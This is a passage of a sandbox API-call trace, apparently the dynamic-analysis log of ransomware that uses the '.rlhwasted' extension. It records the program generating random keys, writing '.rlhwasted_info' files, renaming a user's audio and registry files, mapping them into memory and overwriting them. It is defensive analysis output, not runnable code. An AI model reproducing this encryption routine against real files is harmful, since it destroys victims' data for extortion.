(hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\ju5M6YfKzwMcTi.wav.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\ju5m6yfkzwmcti.wav.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.387] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.388] SetEndOfFile (hFile=0x124) returned 1 [0195.389] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.389] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.389] lstrcpyW (in: lpString1=0x6d54da, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.389] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\ju5M6YfKzwMcTi.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\ju5m6yfkzwmcti.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\ju5M6YfKzwMcTi.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\ju5m6yfkzwmcti.wav.rlhwasted")) returned 1 [0195.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\ju5M6YfKzwMcTi.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\ju5m6yfkzwmcti.wav.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0195.390] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0195.391] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0195.392] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0195.392] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.392] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0195.393] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.393] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.449] SetEndOfFile (hFile=0x124) returned 1 [0195.451] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.451] CloseHandle (hObject=0x124) returned 1 [0195.452] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0195.452] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f98) returned 1 [0195.453] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.453] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.453] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\q_Whchrm6B.wav") returned 73 [0195.453] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x29c) returned 0x6d4580 [0195.453] lstrcpyW (in: lpString1=0x6d4612, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.453] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.453] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f98) returned 1 [0195.454] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.454] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\q_Whchrm6B.wav.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\q_whchrm6b.wav.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.455] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.456] SetEndOfFile (hFile=0x124) returned 1 [0195.456] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.456] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.456] lstrcpyW (in: lpString1=0x6d4612, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\q_Whchrm6B.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\q_whchrm6b.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\q_Whchrm6B.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\q_whchrm6b.wav.rlhwasted")) returned 1 [0195.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\q_Whchrm6B.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\q_whchrm6b.wav.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0195.457] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0195.458] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f98) returned 1 [0195.459] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0195.459] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.459] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f98) returned 1 [0195.460] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.460] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.469] SetEndOfFile (hFile=0x124) returned 1 [0195.471] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.471] CloseHandle (hObject=0x124) returned 1 [0195.473] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0195.473] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f98) returned 1 [0195.474] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.474] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.474] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\Voe7.m4a") returned 67 [0195.474] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x290) returned 0x6d4580 [0195.474] lstrcpyW (in: lpString1=0x6d4606, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.474] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.474] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f98) returned 1 [0195.475] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.475] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\Voe7.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\voe7.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.475] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.476] SetEndOfFile (hFile=0x124) returned 1 [0195.476] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.477] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.477] lstrcpyW (in: lpString1=0x6d4606, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\Voe7.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\voe7.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\Voe7.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\voe7.m4a.rlhwasted")) returned 1 [0195.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\Voe7.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\voe7.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0195.478] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0195.481] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f98) returned 1 [0195.482] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0195.482] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.482] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f98) returned 1 [0195.483] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.483] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.492] SetEndOfFile (hFile=0x124) returned 1 [0195.555] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.555] CloseHandle (hObject=0x124) returned 1 [0195.557] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0195.558] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0195.559] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.559] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.559] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0195.559] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x26c) returned 0x6d4580 [0195.559] lstrcpyW (in: lpString1=0x6d45e2, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.559] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.559] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0195.560] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.560] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.561] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.562] SetEndOfFile (hFile=0x124) returned 1 [0195.562] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.562] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.562] lstrcpyW (in: lpString1=0x6d45e2, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.rlhwasted")) returned 0 [0195.564] GetLastError () returned 0x20 [0195.564] CloseHandle (hObject=0x124) returned 1 [0195.565] lstrcpyW (in: lpString1=0x6d45e2, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.565] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.rlhwasted_info")) returned 1 [0195.566] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0195.567] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0195.568] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.568] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.568] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0195.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2bc) returned 0x70cfe8 [0195.568] lstrcpyW (in: lpString1=0x70d09a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.568] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0195.569] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.569] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.570] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.571] SetEndOfFile (hFile=0x124) returned 1 [0195.571] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.571] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.571] lstrcpyW (in: lpString1=0x70d09a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.rlhwasted")) returned 0 [0195.572] GetLastError () returned 0x20 [0195.572] CloseHandle (hObject=0x124) returned 1 [0195.573] lstrcpyW (in: lpString1=0x70d09a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.573] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.rlhwasted_info")) returned 1 [0195.574] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0195.574] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0195.575] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.575] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.575] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0195.575] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x306) returned 0x6d5420 [0195.575] lstrcpyW (in: lpString1=0x6d551c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.576] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.576] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0195.576] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.577] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.577] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.579] SetEndOfFile (hFile=0x124) returned 1 [0195.579] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.579] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.579] lstrcpyW (in: lpString1=0x6d551c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.579] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.rlhwasted")) returned 0 [0195.579] GetLastError () returned 0x20 [0195.579] CloseHandle (hObject=0x124) returned 1 [0195.580] lstrcpyW (in: lpString1=0x6d551c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.580] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.rlhwasted_info")) returned 1 [0195.582] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0195.582] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0195.583] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.583] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0195.583] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x306) returned 0x6d5420 [0195.583] lstrcpyW (in: lpString1=0x6d551c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.583] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.583] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0195.584] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.584] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.585] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, 